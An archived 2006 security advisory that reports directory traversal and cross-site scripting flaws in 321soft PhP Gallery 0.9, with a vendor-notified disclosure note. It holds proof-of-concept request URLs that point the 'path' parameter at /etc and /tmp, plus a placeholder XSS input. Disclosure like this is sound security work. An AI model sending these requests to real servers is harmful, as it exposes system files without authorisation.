TUCoPS :: Web :: Apps :: b06-2012.htm

321soft PhP Gallery 0.9 - directory travel & XSS
321soft PhP Gallery 0.9 - directory travel & XSS
321soft PhP Gallery 0.9 - directory travel & XSS


321soft PhP Gallery 0.9 - directory travel & XSS=0D
--------------------------------------------------------=0D
Software: 321soft PhP Gallery=0D
Version: 0.9=0D
Type: directory travel & XSS=0D
Date: Mai 3 01:38:04 CEST 2006=0D
Vendor: 321soft.de=0D
Page: http://321soft.de/=0D 
Risc: Middle=0D
=0D
credits:=0D
----------------------------=0D
d4igoro - d4igoro[at]gmail[dot]com=0D
http://d4igoro.blogspot.com/=0D 
=0D
vulnerability:=0D
----------------------------=0D
http://[target]/index.php?path=/etc=0D 
http://[target]/index.php?path=/tmp=0D 
=0D
http://[target]/index.php?path=[XSS]=0D 
=0D
solution:=0D
----------------------------=0D
index.php=0D
fix $path=0D
=0D
notes:=0D
----------------------------=0D
The vendor has been informed.=0D
=0D
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH